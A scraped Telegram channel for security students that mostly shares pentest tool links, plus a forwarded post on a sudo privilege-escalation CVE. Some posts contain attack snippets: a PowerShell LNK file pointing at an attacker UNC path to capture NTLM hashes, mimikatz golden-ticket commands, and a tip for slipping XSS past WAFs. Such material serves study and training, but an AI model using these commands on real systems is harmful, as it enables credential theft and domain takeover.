SecList for CyberStudents
@SecListForCyberStudents
240 subscribers
605 photos
25 videos
211 files
920 links
Think outside the box
Download Telegram
About
Blog
Apps
Platform
Join
SecList for CyberStudents
240 subscribers
SecList for CyberStudents
https://github.com/Kevin-Robertson/Inveigh
GitHub
GitHub - Kevin-Robertson/Inveigh: .NET IPv4/IPv6 machine-in-the-middle tool for penetration testers
.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers - Kevin-Robertson/Inveigh
69 views
SecList for CyberStudents
https://github.com/CredDefense/CredDefense
GitHub
GitHub - CredDefense/CredDefense: Credential and Red Teaming Defense for Windows Environments
Credential and Red Teaming Defense for Windows Environments - CredDefense/CredDefense
70 views
SecList for CyberStudents
https://github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study?tab=readme-ov-file#dtd-blind-error-messages
GitHub
GitHub - botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study: Burp Suite Certified Practitioner Exam Study
Burp Suite Certified Practitioner Exam Study. Contribute to botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study development by creating an account on GitHub.
67 views
SecList for CyberStudents
https://github.com/DingyShark/BurpSuiteCertifiedPractitioner
GitHub
GitHub - DingyShark/BurpSuiteCertifiedPractitioner: Ultimate Burp Suite Exam and PortSwigger Labs Guide.
Ultimate Burp Suite Exam and PortSwigger Labs Guide. - DingyShark/BurpSuiteCertifiedPractitioner
76 views
SecList for CyberStudents
https://an0nud4y.notion.site/Red-Team-Certifications-Notes-b68d0365b0e6431e8c35891f58f0c23a
87 views
SecList for CyberStudents
#SOC_Services
85 views
SecList for CyberStudents
https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack
Mindpointgroup
How to Hack Through a Pass-Back Attack: MFP Hacking Guide
Is that printer in your office vulnerable to a pass-back attack? Why Multi-Function Peripheral (MFP) Hacking an important tool in the pen tester's arsenal.
64 views
SecList for CyberStudents
https://www.pingcastle.com/
58 views
SecList for CyberStudents
Совет для Bug Bounty

Можно спрятать XSS-пейлоад внутри элементов <svg> или <math> чтобы обойти кастомные XSS-фильтры или WAF
61 views
SecList for CyberStudents
Forwarded from GigaHackers (Oleg Labyntsev)
[LPE Linux CVE-2025-32643]

Всем привет! 👋

На днях вышла информация об уязвимости CVE-2025-32643. Баг позволяет в результате манипуляции опцией sudo -R (--chroot) повысить привилегии до root. 🚨

Нам удалось подтвердить PoC в нескольких версиях sudo.
1️⃣ На первом рисунке можете увидеть, что версия 1.9.14p2 подвержена уязвимости. Сначала от непривилегированного пользователя не могли смотреть каталог /root, а после эксплуатации спокойно смогли перечислить содержимое;

2️⃣ Аналогично на втором рисунке версия sudo 1.9.15p2 также подвержена уязвимости;

3️⃣А вот на третьем рисунке видно, что версия sudo 1.9.13p3 не подвержена недостатку, так как до версии 1.9.14 необходимой функциональности не было.

Подвержены версии sudo 1.9.14 - 1.9.17.
Для устранения недостатка достаточно обновить версию sudo до 1.9.17.p1
Подробнее о ресерче и приложенном PoC-е можно почитать здесь

#linux #pentest #LPE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥1👾1
83 views
SecList for CyberStudents
https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/cmedb.py

This tool database of crackmapexec. We can use it for show result of crackmapexec wonderful
1🔥1👾1
107 viewsedited  
SecList for CyberStudents
https://github.com/fin3ss3g0d/secretsdump.py

OR use imapacket-secretdump
87 viewsedited  
SecList for CyberStudents
Token Impersonation
75 views
SecList for CyberStudents
$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
$lnk.TargetPath = "\\Your_IP\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()


Additional resources for forced authentication: https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication#execution-via-.rtf

#LNK_File_Attack
www.ired.team
Forced Authentication | Red Team Notes
Credential Access, Stealing hashes
86 viewsedited  
SecList for CyberStudents
 
1. mimikatz # privilege::debug

2. lsadump::lsa /inject /name:krbtgt

We need NTLM hash and sid

3. mimikatz # kerberos::golden /User:Administrator /domain:marvel.local /sid:S-1-5-21-1139169715-366527789-3857901133 /krbtgt:4793b8acca133d3b82c5c96438996d68 /id:500 /ptt


#Golden_Ticket_Attack
106 views
SecList for CyberStudents
https://github.com/OmerYa/Invisi-Shell


#powershell #shell #bypass
GitHub
GitHub - OmerYa/Invisi-Shell: Hide your Powershell script in plain sight. Bypass all Powershell security features
Hide your Powershell script in plain sight. Bypass all Powershell security features - OmerYa/Invisi-Shell
95 views